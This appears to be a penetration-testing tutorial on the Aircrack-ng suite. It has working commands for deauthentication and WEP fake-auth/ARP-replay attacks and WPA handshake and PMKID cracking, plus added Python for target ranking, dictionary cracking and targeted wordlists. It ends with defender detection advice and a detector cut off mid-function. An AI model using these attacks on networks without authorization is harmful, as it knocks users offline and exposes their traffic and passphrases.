What Is Aircrack-ng?
Aircrack-ng is not a single tool — it's a complete suite of command-line utilities for WiFi network security auditing. The name is a portmanteau of "air" (wireless) and "crack" (break), but the suite does far more than crack passwords. It encompasses everything from putting a wireless card into monitor mode, to capturing packets, injecting frames, performing deauthentication attacks, and — yes — recovering WPA/WPA2 pre-shared keys from captured handshakes.
The suite is maintained as an open-source project on GitHub and is pre-installed on Kali Linux, Parrot OS and most WiFi-focused penetration testing distributions. It builds natively on Linux and has been ported to macOS and Windows (via WSL2 or Cygwin), but only the cracking side is practical there: airmon-ng, airodump-ng and aireplay-ng rely on the Linux mac80211 stack for monitor mode and frame injection, so Linux remains the platform to capture and inject on.
Tools in the Aircrack-ng Suite
- airmon-ng — Places wireless interfaces into monitor mode, kills conflicting processes, and manages virtual interfaces. The starting point for every WiFi audit.
- airodump-ng — Passive WiFi reconnaissance: captures nearby 802.11 frames, flags captured handshakes and PMKIDs in its display, and logs AP and client data to pcap, CSV and Kismet-compatible files (selectable with --output-format).
- aireplay-ng — Frame injection tool: performs deauthentication attacks, fake authentication attacks, interactive packet replay, and client association flooding.
- aircrack-ng — The cracking engine: takes a capture containing a WPA/WPA2 4-way handshake and recovers the PSK by testing a wordlist, supplied with -w or piped in on stdin from a generator such as crunch or john. It runs on the CPU only; GPU cracking means exporting the capture to Hashcat (see below). For WEP it implements the PTW and Korek statistical attacks, which need IVs rather than a wordlist.
- airdecap-ng — Decrypts WEP and WPA/WPA2 traffic after the PSK has been recovered.
- airolib-ng — Manages pre-computed PMK (Pairwise Master Key) tables for faster WPA cracking.
- airbase-ng — Creates soft APs (similar to hostapd, but designed to complement aircrack workflows).
- packetforge-ng — Crafts packets (ARP, UDP, ICMP or arbitrary) for injection into WEP networks, using a keystream (PRGA) recovered by aireplay-ng's chopchop or fragmentation attacks.
Installation and Hardware Requirements
Installation
$ # Kali/Parrot (pre-installed)
$ sudo apt update && sudo apt install aircrack-ng
$ # Verify
$ aircrack-ng --help
Aircrack-ng 1.7 - (C) 2006-2024 Thomas d'Otreppe
https://www.aircrack-ng.org
Hardware Requirements
Monitor mode support is non-negotiable. Not all WiFi adapters can enter monitor mode or inject frames. This is a hardware and driver limitation, not a software one.
| Adapter | Chipset | Monitor Mode | Frame Injection | Band |
|---|---|---|---|---|
| Alfa AWUS036ACH | Realtek RTL8812AU | ✅ Yes (with driver) | ✅ Yes | 2.4GHz + 5GHz |
| Alfa AWUS1900 | Realtek RTL8814AU | ✅ Yes | ✅ Yes | 2.4GHz + 5GHz |
| TP-Link TL-WN722N (v1) | Atheros AR9271 | ✅ Yes | ✅ Yes | 2.4GHz only |
| TP-Link TL-WN722N (v2/v3) | Realtek RTL8188EUS | ⚠️ Limited (driver issues) | ⚠️ Partial | 2.4GHz only |
| Internal laptop WiFi | Varies (Intel, Broadcom, etc.) | ⚠️ Varies by model | ❌ Usually no | Varies |
Recommendation: The Alfa AWUS036ACH and AWUS1900 are the usual choice for penetration testing: dual-band, high transmit power and well-understood injection behaviour. Both depend on the out-of-tree Realtek driver (the realtek-rtl88xxau-dkms package in Kali), so confirm it builds against your current kernel before an engagement, not at the client site. If you prefer a card the mainline kernel supports, the Alfa AWUS036ACM (MediaTek MT7612U, mt76 driver) does monitor mode and injection on both bands with no extra driver. Whatever you pick, verify injection with aireplay-ng --test before relying on it.
Basic WiFi Auditing Workflow
Step 1: Place Adapter in Monitor Mode
$ # Check available wireless interfaces
$ iwconfig
wlan0 IEEE 802.11 Mode:Managed ESSID:"Corporate_5G"
$ # Kill processes that would flip the card back to managed mode (NetworkManager, wpa_supplicant)
$ sudo airmon-ng check kill
Killing these processes:

  PID Name
  543 wpa_supplicant
  612 NetworkManager
$ # Create a monitor mode interface on wlan0
$ sudo airmon-ng start wlan0
PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
$ # Verify
$ iwconfig wlan0mon
wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz
The interface name depends on the driver: mac80211 drivers create wlan0mon, while some out-of-tree drivers keep the original name and only change its type, so read the airmon-ng output rather than assuming. When you are done, sudo airmon-ng stop wlan0mon followed by sudo systemctl start NetworkManager restores normal connectivity.
Step 2: Reconnaissance with Airodump-ng
$ # Hop over both 2.4 GHz and 5 GHz channels (the default hops 2.4 GHz only);
$ # add --manufacturer and --wps for OUI vendor and WPS columns if you want them
$ sudo airodump-ng --band abg wlan0mon
CH  9 ][ Elapsed: 12 s ][ 2026-04-07 10:32
BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID
AA:BB:CC:DD:EE:01 -42 134 8 0 11 540 WPA2 CCMP PSK Corporate
AA:BB:CC:DD:EE:02 -67 89 3 0 6 540 WPA2 CCMP PSK Corporate_5G
AA:BB:CC:DD:EE:03 -81 45 0 0 1 130 WPA2 CCMP PSK HomeNetwork
AA:BB:CC:DD:EE:04 -54 98 0 0 36 867 OPN * FreePublicWiFi
AA:BB:CC:DD:EE:05 -38 210 12 0 6 130 WEP WEP OldRouter
BSSID STATION PWR Rate Lost Frames Notes Probes
AA:BB:CC:DD:EE:01 00:11:22:33:44:55 -67 0-54 0 12 EAPOL Corporate
AA:BB:CC:DD:EE:01 66:77:88:99:AA:BB -55 0-54 0 8 EAPOL -
Key columns: PWR (signal strength in dBm, closer to 0 is stronger; -1 means the driver reports no RSSI), Beacons (AP broadcast frames), #Data (data frames captured; a rising count means a client is actually talking, which is what you want for a handshake), CH (channel), ENC/CIPHER/AUTH (WPA2 CCMP PSK is a pre-shared-key network whose handshake can be cracked offline; AUTH MGT means 802.1X/Enterprise and a handshake will not yield a passphrase; WPA3 SAE cannot be attacked offline at all), and the lower panel listing STATION (associated client MACs), Notes (EAPOL or PMKID once airodump-ng has seen key material from that pair) and Probes (SSIDs the client has asked for).
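The CSV that airodump-ng writes alongside the pcap when you use --write (prefix-01.csv) is the easiest place to pick targets from once a scan has run for a while. The following is an added example, not part of the original page or of the Aircrack-ng project: it parses that CSV layout (an AP section, a blank line, a station section, with the column names airodump-ng writes) into Python structures, ranks WPA/WPA2-PSK networks by how many associated clients they have (the ones where a handshake is likeliest), and lists open and WEP networks separately. The sample CSV is constructed for the example; the BSSIDs, timestamps and counts are made up.

```python
import csv
import io

# Constructed sample in the layout airodump-ng writes to <prefix>-01.csv:
# AP section, blank line, station section. All values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2026-04-07 10:32:01, 2026-04-07 10:32:13, 11, 540, WPA2, CCMP, PSK, -42, 134, 8, 0.  0.  0.  0, 9, Corporate,
AA:BB:CC:DD:EE:02, 2026-04-07 10:32:01, 2026-04-07 10:32:13, 36, 540, WPA2, CCMP, PSK, -67, 89, 3, 0.  0.  0.  0, 12, Corporate_5G,
AA:BB:CC:DD:EE:04, 2026-04-07 10:32:02, 2026-04-07 10:32:13, 36, 867, OPN, , , -54, 98, 0, 0.  0.  0.  0, 14, FreePublicWiFi,
AA:BB:CC:DD:EE:05, 2026-04-07 10:32:01, 2026-04-07 10:32:13, 6, 130, WEP, WEP, , -38, 210, 12, 0.  0.  0.  0, 9, OldRouter,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2026-04-07 10:32:03, 2026-04-07 10:32:13, -67, 12, AA:BB:CC:DD:EE:01, Corporate
66:77:88:99:AA:BB, 2026-04-07 10:32:04, 2026-04-07 10:32:12, -55, 8, AA:BB:CC:DD:EE:01,
CC:DD:EE:FF:00:11, 2026-04-07 10:32:05, 2026-04-07 10:32:10, -70, 3, (not associated), Corporate,HomeNetwork
"""


def _rows(section):
    # airodump-ng separates fields with ", "; skipinitialspace drops the space.
    reader = csv.DictReader(io.StringIO(section), skipinitialspace=True)
    for row in reader:
        yield {k: (v.strip() if isinstance(v, str) else v) for k, v in row.items()}


def parse_airodump_csv(text):
    """Return (aps, unassociated): aps maps BSSID -> dict with a 'clients' list."""
    text = text.replace("\r\n", "\n").strip()
    ap_section, sta_section = text.split("\n\n", 1)
    aps = {}
    for row in _rows(ap_section):
        aps[row["BSSID"]] = {
            "essid": row["ESSID"],
            "channel": int(row["channel"]),
            "privacy": row["Privacy"],
            "cipher": row["Cipher"],
            "auth": row["Authentication"],
            "power": int(row["Power"]),
            "clients": [],
        }
    unassociated = []
    for row in _rows(sta_section):
        # Probed ESSIDs are comma separated, so csv spills the extras into the None key.
        probes = [row.get("Probed ESSIDs") or ""] + list(row.get(None) or [])
        station = {
            "mac": row["Station MAC"],
            "power": int(row["Power"]),
            "bssid": row["BSSID"],
            "probes": [p.strip() for p in probes if p and p.strip()],
        }
        if station["bssid"] in aps:
            aps[station["bssid"]]["clients"].append(station)
        else:
            unassociated.append(station)
    return aps, unassociated


def handshake_targets(aps):
    """WPA/WPA2-PSK networks, most associated clients first, then strongest signal."""
    psk = [(b, a) for b, a in aps.items()
           if a["privacy"].startswith("WPA") and a["auth"] == "PSK"]
    psk.sort(key=lambda ba: (-len(ba[1]["clients"]), -ba[1]["power"]))
    return [b for b, _ in psk]


def weak_networks(aps):
    """Open and WEP networks: no handshake needed, but still only with authorization."""
    return sorted(b for b, a in aps.items() if a["privacy"] in ("OPN", "WEP"))


def report(text):
    aps, unassoc = parse_airodump_csv(text)
    lines = []
    for b in handshake_targets(aps):
        a = aps[b]
        lines.append(f"{b} {a['essid']:<16} ch {a['channel']:>3} {a['power']:>4} dBm "
                     f"{len(a['clients'])} client(s)")
    for b in weak_networks(aps):
        lines.append(f"{b} {aps[b]['essid']:<16} {aps[b]['privacy']} (weak)")
    for s in unassoc:
        lines.append(f"{s['mac']} unassociated, probing for {', '.join(s['probes']) or '-'}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_CSV)))
```

Point it at a real prefix-01.csv from an engagement and the ranking tells you which channel to lock airodump-ng to in the next step; networks with zero associated clients are poor handshake candidates no matter how strong their signal.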
Step 3: Capture Handshakes on a Specific AP
$ # Target Corporate AP on channel 11, save capture to /root/captures/
$ sudo airodump-ng wlan0mon \
--channel 11 \
--bssid AA:BB:CC:DD:EE:01 \
--write /root/captures/corporate_handshake \
--output-format pcap
CH 11 ][ Elapsed: 0 s ][ 2026-04-07 10:35 ][ WPA handshake: AA:BB:CC:DD:EE:01
BSSID STATION PWR Rate Lost Frames Notes Probes
AA:BB:CC:DD:EE:01 00:11:22:33:44:55 -67 0-54 0 5 EAPOL Corporate
AA:BB:CC:DD:EE:01 66:77:88:99:AA:BB -55 0-54 0 3 EAPOL
The "WPA handshake: <BSSID>" text at the right of the header line is the indicator that airodump-ng has a usable 4-way handshake; EAPOL in a client's Notes column means key frames from that client have been seen. Airodump-ng keeps running until you stop it, and --write appends a sequence number to the prefix, so the file here is /root/captures/corporate_handshake-01.cap. Verify the capture before leaving the site: running aircrack-ng on the file without -w lists each network with its handshake count, e.g. "WPA (1 handshake)". The minimum that cracks is messages 2 and 3 (or 1 and 2) of the same exchange plus a beacon or probe response carrying the ESSID; if the count is 0, stay on the channel and wait for, or force, another association.
Forcing Handshake Capture with Deauthentication
Passive capture only yields a handshake when a client happens to (re)connect while you are listening. To speed this up, use aireplay-ng to send deauthentication frames that forcibly disconnect connected clients; most clients reconnect within seconds, and airodump-ng, still running with --channel 11 so the card stays on the AP's channel, captures the new handshake. The interface is the last argument; -a is the AP and -c (optional) a specific client.
$ # Send 10 deauth bursts to all clients of AA:BB:CC:DD:EE:01 (broadcast)
$ sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:01 wlan0mon
10:36:02  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:01) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
10:36:02  Sending DeAuth (code 7) to broadcast -- BSSID: [AA:BB:CC:DD:EE:01]
$ # Directed deauth to one client (more reliable: some clients ignore broadcast deauths)
$ sudo aireplay-ng --deauth 5 \
    -a AA:BB:CC:DD:EE:01 \
    -c 00:11:22:33:44:55 \
    wlan0mon
10:36:20  Sending 64 directed DeAuth (code 7). STMAC: [00:11:22:33:44:55] [ 4|62 ACKs]
The two ACK counters at the end of the directed line are your feedback: they count acknowledgements from the client and from the AP, and [ 0| 0 ACKs] means nobody heard you (wrong channel, too far away, or injection not working; aireplay-ng also refuses to run if wlan0mon is not on the AP's channel). Deauthentication fails even with working injection when the network uses 802.11w Protected Management Frames, which authenticate deauth and disassociation frames; PMF is mandatory in WPA3 and optional but increasingly enabled on WPA2. --deauth 0 sends indefinitely; prefer a small count, because every burst knocks real users off the AP. In an authorized penetration test deauthentication is a standard technique; outside one it is illegal (the CFAA in the US, with equivalents in most other jurisdictions) and it hits innocent bystanders on the same channel. Use only with explicit, written authorization.
Fake Authentication Attack (WEP)
For legacy WEP networks (still found on some IoT and industrial equipment), fake authentication associates your card with the AP without knowing the WEP key. That matters because an AP discards frames from unassociated stations, and the ARP-replay attack that follows needs the AP to accept your injected frames and answer them so that you collect enough unique IVs for aircrack-ng's PTW attack. -h is the MAC of your own injecting interface (check it with ip link or macchanger -s wlan0mon), not a client seen on another network; if the AP filters MACs you must spoof an address that is already allowed.
$ # Associate with the WEP AP, re-authenticating every 30 seconds to stay associated
$ sudo aireplay-ng --fakeauth 30 -a AA:BB:CC:DD:EE:05 -h 00:11:22:33:44:55 wlan0mon
10:40:01  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:05) on channel 6

10:40:01  Sending Authentication Request (Open System) [ACK]
10:40:01  Authentication successful
10:40:01  Sending Association Request [ACK]
10:40:01  Association successful :-) (AID: 1)
$ # Wait for an ARP request from the network and replay it to make the AP generate new IVs
$ sudo aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:05 -h 00:11:22:33:44:55 wlan0mon
10:40:30  Waiting for beacon frame (BSSID: AA:BB:CC:DD:EE:05) on channel 6
Saving ARP requests in replay_arp-0407-104030.cap
You should also start airodump-ng to capture replies.
Read 2512 packets (got 1 ARP requests and 1024 ACKs), sent 1231 packets...(499 pps)
Keep airodump-ng writing on channel 6 at the same time, since the AP's responses are what carry the fresh IVs, then run aircrack-ng with -b AA:BB:CC:DD:EE:05 against that capture. PTW typically recovers a 104-bit key with on the order of 40,000 to 85,000 IVs, and aircrack-ng re-reads the growing capture and retries on its own while it runs. "Got a deauthentication packet!" during fake authentication usually means MAC filtering, or that a real client is already using the address you chose.
Cracking WPA/WPA2 — Dictionary Attack
Using Aircrack-ng Directly
$ # Crack using a wordlist. Kali ships rockyou as /usr/share/wordlists/rockyou.txt.gz;
$ # gunzip it first. -b selects the BSSID when the capture holds several networks.
$ aircrack-ng -w /usr/share/wordlists/rockyou.txt \
    -b AA:BB:CC:DD:EE:01 \
    /root/captures/corporate_handshake-01.cap
Reading packets, please wait...
Opening /root/captures/corporate_handshake-01.cap
Read 1532 packets.

1 potential targets

                               Aircrack-ng 1.7

      [00:00:12] 18148/14344392 keys tested (1512.34 k/s)

      Time left: 2 hours, 37 minutes                           0.13%

                        KEY FOUND! [ NetworkPassword123! ]

      Master Key     : 4F 3A D2 8B 1C 09 E7 F4 ...
      Transient Key  : 8A 7B 3C 9D 2E 1F 4A 6B ...
      EAPOL HMAC     : 1A 2B 3C 4D 5E 6F 7A 8B ...
Note that k/s in this output is keys per second, not thousands: each candidate costs a PBKDF2-HMAC-SHA1 derivation with 4096 iterations (8192 HMAC operations) before the handshake MIC can be checked, so a CPU manages a few hundred to a few thousand candidates per second and the full rockyou list takes hours.
GPU-Accelerated Cracking with Hashcat
CPU cracking with aircrack-ng is slow. For real engagements, convert the capture to Hashcat's 22000 format with hcxpcapngtool (Kali package hcxtools) and run it on a GPU. Mode 22000 covers both 4-way handshakes and PMKIDs in one hash file and replaced the older hccapx/-m 2500 and -m 16800 modes, which hashcat 6.x only accepts with --deprecated-check-disable.
$ # Convert the capture (handshakes and any PMKIDs) to hashcat 22000 format
$ sudo apt install hcxtools
$ hcxpcapngtool -o /root/captures/corporate.22000 /root/captures/corporate_handshake-01.cap
$ # Crack with hashcat on the GPU; --show later prints recovered passphrases from the potfile
$ hashcat -m 22000 /root/captures/corporate.22000 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

CUDA API (CUDA 12.2)
====================
* Device #1: NVIDIA GeForce RTX 4090, 23536/24080 MB, 128MCU

[...]
Speed.#1.........:  2480.3 kH/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
$ hashcat -m 22000 --show /root/captures/corporate.22000
The speed line is the number to internalize (the figure above is illustrative for a top-end consumer card). A GPU tests a few million WPA candidates per second, so every passphrase in rockyou.txt (about 14.3 million entries) is tested in seconds, where the same list takes hours on a CPU. The rate is still bounded by the 4096 PBKDF2 iterations per candidate, which is why random passphrases hold up: 95 printable characters to the power of 12 is about 5 × 10^23 candidates, roughly 7 billion years at 2.5 MH/s. The practical lesson is that WPA2-PSK is exactly as strong as the passphrase's resistance to a wordlist plus mangling rules, which is why WPA3 (no offline attack at all) and long random passphrases matter.
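Both cracking sections above, the aircrack-ng dictionary run and the GPU run, do the same computation per candidate; the following is an added example (not code from the page or from the Aircrack-ng or Hashcat projects) that spells it out in Python so the cost and the check are visible. For each candidate it derives the PMK with PBKDF2-HMAC-SHA1 over the SSID, expands the PTK with the 802.11 PRF from the two MACs and two nonces, and verifies the EAPOL-Key MIC of message 2 with the KCK; it also shows the PMKID check (HMAC-SHA1 over "PMK Name" and the two MACs), which needs no client at all. Because no real capture can be embedded here, the sample handshake is constructed: the nonces, MACs and wordlist are made up and the MIC is computed from the known passphrase, so the dictionary loop has something to find. The EAPOL frame layout in build_eapol_m2 is the standard RSN key descriptor; the test vector PBKDF2("password", "IEEE") is the one published with 802.11i.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of EAPOL-Key fields precede the 16-byte MIC


def pmk_from_passphrase(passphrase, ssid):
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The 4096 iterations (8192 HMAC-SHA1 calls) are the cost of every candidate.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    # 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, first 64 bytes
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    # aa = AP MAC, spa = client MAC; sorting makes both sides derive the same PTK
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol):
    # MIC over the EAPOL frame with the MIC field zeroed; the algorithm is chosen by the
    # descriptor version in the low 3 bits of Key Information (bytes 5-6, big-endian).
    version = eapol[6] & 0x07
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:   # WPA/TKIP
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:   # WPA2/CCMP
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("descriptor version %d (AES-128-CMAC) not handled here" % version)


def pmkid(pmk, aa, spa):
    # RSN PMKID as carried in message 1 or a (re)association request; no client needed
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, aa, spa, anonce, snonce, eapol, candidates):
    """Return the passphrase whose KCK verifies the MIC in eapol (an M2 or M3 frame), or None."""
    target = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for pw in candidates:
        if not 8 <= len(pw) <= 63:          # outside the WPA-PSK passphrase range: skip
            continue
        kck = ptk_from_pmk(pmk_from_passphrase(pw, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), target):
            return pw
    return None


def crack_pmkid(ssid, aa, spa, target, candidates):
    for pw in candidates:
        if 8 <= len(pw) <= 63 and hmac.compare_digest(
                pmkid(pmk_from_passphrase(pw, ssid), aa, spa), target):
            return pw
    return None


def build_eapol_m2(snonce, mic=b"\x00" * 16, key_data=b""):
    # Minimal RSN EAPOL-Key message 2, used here only to construct the sample capture
    body = (b"\x02"                       # descriptor type: RSN
            + b"\x01\x0a"                 # key info: version 2 (HMAC-SHA1), pairwise, MIC set
            + b"\x00\x10"                 # key length
            + (1).to_bytes(8, "big")      # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, ID
            + mic + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v2, type EAPOL-Key


# Constructed sample "capture": MACs, nonces and wordlist are made up; the MIC and PMKID
# are computed from TRUE_PASSPHRASE so the dictionary loop has something to find.
SSID = "Corporate"
AA = bytes.fromhex("AABBCCDDEE01")
SPA = bytes.fromhex("001122334455")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
TRUE_PASSPHRASE = "NetworkPassword123!"
WORDLIST = ["password", "short", "Summer2024!", "NetworkPassword123!", "admin12345"]


def constructed_capture():
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = ptk_from_pmk(pmk, AA, SPA, ANONCE, SNONCE)[:16]
    m2 = build_eapol_m2(SNONCE)
    m2 = build_eapol_m2(SNONCE, mic=eapol_mic(kck, m2))
    return m2, pmkid(pmk, AA, SPA)


def demo():
    m2, pid = constructed_capture()
    return (crack_handshake(SSID, AA, SPA, ANONCE, SNONCE, m2, WORDLIST),
            crack_pmkid(SSID, AA, SPA, pid, WORDLIST))


if __name__ == "__main__":
    print(demo())
```

Everything a cracker needs from the air is visible in the function signatures: the SSID, the two MACs, the two nonces and one MIC-bearing EAPOL frame (or just a PMKID). Real crackers compute the PMK once per candidate and reuse it for every handshake and PMKID with the same SSID, which is why hashcat groups hashes by ESSID; the skip of candidates outside 8 to 63 characters is also what aircrack-ng and hashcat do, so trimming a wordlist to that range costs nothing.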
Wordlist Generation and Usage
Rockyou.txt is a good starter wordlist but insufficient for targeted assessments. It dates from a 2009 breach, a large share of its entries are shorter than the 8-character minimum WPA-PSK enforces, and corporate WiFi passphrases are usually built from the company or site name, the year and a suffix rather than drawn from a consumer password dump. Build a target-specific list from what reconnaissance gave you (SSIDs, company and product names, locations) and let rules expand it.
$ # Profile-based list with CUPP (Common User Passwords Profiler); it asks for names,
$ # dates, company and extra keywords interactively and writes <firstname>.txt
$ git clone https://github.com/Mebus/cupp.git
$ python3 cupp/cupp.py -i
> First Name: John
> Surname: Smith
> Nickname: 
> Birthdate (DDMMYYYY): 01121990
(further prompts for partner, children, pet, company name and key words such as acme,corporate)
[+] Saving dictionary to john.txt, counting 12847 words.
$ # Expand with hashcat rules: best64 does case changes and common digit/symbol appends,
$ # leetspeak.rule does the a->4, e->3 substitutions; rules are applied on the GPU,
$ # so each extra variant costs no disk I/O
$ hashcat -m 22000 /root/captures/corporate.22000 john.txt -r /usr/share/hashcat/rules/best64.rule
$ hashcat -m 22000 --show /root/captures/corporate.22000
--show prints each cracked hash line with the passphrase appended after a colon. A passphrase of the form AcmeCorp2024! (company name, year, symbol) is exactly what a profiled list plus rules recovers and a generic breach list never will.
WiFi-specific Wordlists
$ # Download pre-built WiFi-specific wordlists
$
$ # The list is frequency-ordered; keep the most common entries that mention the target SSID
$ grep -i corporate /root/wifi_top1M.txt | head -1000 > /tmp/corporate_wordlist.txt
$ aircrack-ng -w /tmp/corporate_wordlist.txt -b AA:BB:CC:DD:EE:01 /root/captures/corporate_handshake-01.cap
Whatever list you use, entries shorter than 8 or longer than 63 characters can never be a WPA-PSK passphrase; aircrack-ng skips them, but they still cost time to read, so strip them first.
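As an added example (not from the page, CUPP or the Aircrack-ng project), a small generator for the kind of targeted list described above. It takes the tokens collected during reconnaissance (company, SSID, site), combines them with years, separators and common suffixes, applies case and leetspeak variants, and keeps only candidates in the 8 to 63 printable-character range that WPA-PSK accepts; the same filter is applied to downloaded lists by filter_wordlist. The token choices, suffixes and leet map are assumptions to adapt per target; the inputs in the main block are constructed.

```python
import itertools
import string

LEET = str.maketrans("aeios", "43105")           # assumed substitution map
SUFFIXES = ("", "!", "#", "1", "123", "2024!")   # assumed common endings
SEPARATORS = ("", "-", "_", ".")
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def wpa_acceptable(candidate):
    """WPA-PSK passphrases are 8-63 printable ASCII characters; anything else is a wasted guess."""
    return 8 <= len(candidate) <= 63 and all(c in PRINTABLE for c in candidate)


def variants(word):
    """Case and leetspeak variants of one token."""
    forms = {word.lower(), word.capitalize(), word.upper(), word}
    return forms | {f.translate(LEET) for f in forms}


def targeted_wordlist(tokens, years):
    """Candidates from recon tokens: token, token+year, token+sep+token, each with suffixes."""
    stems = set()
    for t in tokens:
        stems |= variants(t)
        for y in years:
            stems |= {v + str(y) for v in variants(t)}          # Acme2024
            stems |= {v + str(y)[-2:] for v in variants(t)}     # Acme24
    for a, b in itertools.permutations(tokens, 2):
        for sep in SEPARATORS:
            stems |= {va + sep + vb for va in variants(a) for vb in variants(b)}
    out = {s + suf for s in stems for suf in SUFFIXES}
    return sorted(c for c in out if wpa_acceptable(c))


def filter_wordlist(lines):
    """Drop duplicates and entries a WPA-PSK can never be (much of rockyou.txt is shorter than 8)."""
    seen = set()
    for line in lines:
        word = line.rstrip("\r\n")
        if wpa_acceptable(word) and word not in seen:
            seen.add(word)
            yield word


if __name__ == "__main__":
    # Constructed inputs: a company name, the SSID from the scan, and two plausible years.
    words = targeted_wordlist(["Acme", "Corporate"], [2023, 2024])
    print(len(words), "candidates, e.g.", words[:5])
    with open("/usr/share/wordlists/rockyou.txt", errors="replace") as f:
        print(sum(1 for _ in filter_wordlist(f)), "usable rockyou entries")
```

Write the output to a file and hand it to aircrack-ng -w or hashcat; for larger expansions let hashcat's rule engine do the mutation instead of materializing every variant on disk.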
Detection by Network Defenders
WiFi attacks leave detectable signatures for organizations with the right monitoring infrastructure:
- Deauthentication floods: Kismet (its DEAUTHFLOOD alert) and the WIDS/WIPS functions of enterprise controllers (Cisco, Aruba and others) alert when deauthentication or disassociation frames on a channel exceed a baseline, or when they carry the AP's own source address while the AP itself is not sending them. aireplay-ng's default burst of 64 frames with reason code 7 is far above anything a healthy network produces. Wireshark is not an IDS, but the display filter wlan.fc.type_subtype == 0x0c on a monitor-mode capture shows the same thing after the fact. The spike points at aireplay-ng; airodump-ng on its own is passive.
- Rogue AP detection: Enterprise WiFi controllers maintain a database of authorized BSSIDs. An AP advertising a corporate ESSID from an unknown BSSID (what airbase-ng produces) is immediately flagged as a rogue and an Evil Twin candidate.
- What monitor mode does and does not reveal: passive sniffing (airodump-ng) transmits nothing and cannot be detected over the air. Everything detectable comes from what the attacker transmits: deauth bursts, fake authentication from a MAC that never completes a normal association, replayed frames, and frames whose sequence numbers or signal strength do not match the legitimate transmitter of that MAC, which is the basis of WIDS MAC-spoofing alerts.
- Client MAC address anomalies: a client MAC that appears at two very different signal levels at once, or that associates and then fails 802.1X, indicates spoofing. Note that one MAC probing for several SSIDs is normal client behaviour (devices probe for every saved network), not an attack signature.
- Endpoint telemetry: on managed endpoints, EDR can flag the aircrack-ng binaries, an interface switching to monitor mode, or .cap and .22000 files being created. This only helps when the attacker uses a corporate-owned device; it is irrelevant to a tester with their own laptop.
The most effective defense against WPA cracking is WPA3-SAE (Simultaneous Authentication of Equals): the password exchange is not susceptible to offline dictionary attacks, it provides forward secrecy, and WPA3 requires Protected Management Frames, which defeats the deauthentication step as well. WPA2-Enterprise with EAP-TLS (certificate-based mutual authentication) is the next best option, since there is no shared passphrase to capture. If you must use WPA2-Personal, enable 802.11w where your clients support it and use a long random passphrase, at least 16 characters, with no dictionary words or company references.
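As an added example (not from the page or any WIDS product), the first detection bullet written out as code: packets from a monitor-mode capture are stripped of their radiotap header, management frames are parsed, and deauthentication and disassociation frames are counted per BSSID in a sliding time window; a burst above the threshold raises one alert. The frames are constructed for the example with a minimal radiotap header and the same shape as an aireplay-ng broadcast burst (64 frames, reason code 7); the threshold and window are assumptions to tune against your own baseline.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC, BEACON = 12, 10, 8   # 802.11 management frame subtypes


def strip_radiotap(pkt):
    # radiotap header: version(1) pad(1) length(2, little-endian) present-flags(4) ...
    rt_len = struct.unpack_from("<H", pkt, 2)[0]
    return pkt[rt_len:]


def parse_mgmt(frame):
    """Return (subtype, addr1, addr2, addr3, seq, reason) for a management frame, else None."""
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0:           # frame type 0 = management
        return None
    subtype = fc >> 4
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    seq = struct.unpack_from("<H", frame, 22)[0] >> 4
    reason = struct.unpack_from("<H", frame, 24)[0] if subtype in (DEAUTH, DISASSOC) else None
    return subtype, addr1, addr2, addr3, seq, reason


def mac_str(b):
    return ":".join("%02x" % x for x in b)


class DeauthFloodDetector:
    def __init__(self, threshold=20, window=10.0):
        self.threshold = threshold       # assumed: frames per window that count as a flood
        self.window = window             # seconds
        self.seen = defaultdict(deque)   # bssid -> timestamps of deauth/disassoc frames

    def observe(self, ts, pkt):
        """Feed one captured packet; return an alert dict the moment a BSSID crosses the threshold."""
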